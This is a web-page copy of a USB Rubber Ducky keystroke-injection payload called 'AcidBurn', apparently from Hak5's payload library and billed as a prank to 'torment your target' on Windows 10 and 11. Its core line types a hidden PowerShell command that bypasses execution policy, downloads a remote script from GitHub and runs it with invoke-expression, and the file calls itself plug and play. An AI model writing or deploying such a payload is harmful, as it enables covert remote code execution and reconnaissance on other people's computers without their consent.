Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/prank/-RD-AcidBurn/payload.txt
2968 views
1
REM Title: AcidBurn
2
3
REM Author: I am Jakoby
4
5
REM Description: This payload is meant to torment your target to the fullest extent. Mission to recon then roast. See README.md for more details
6
7
REM Target: Windows 10, 11
8
9
REM --------------------------------------------------------------------------------------
10
REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
11
REM --------------------------------------------------------------------------------------
12
13
GUI r
14
DELAY 500
15
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://raw.githubusercontent.com/I-Am-Jakoby/hak5-submissions/main/OMG/Payloads/OMG-AcidBurn/AcidBurn.ps1?dl=1; invoke-expression $pl
16
ENTER
17
18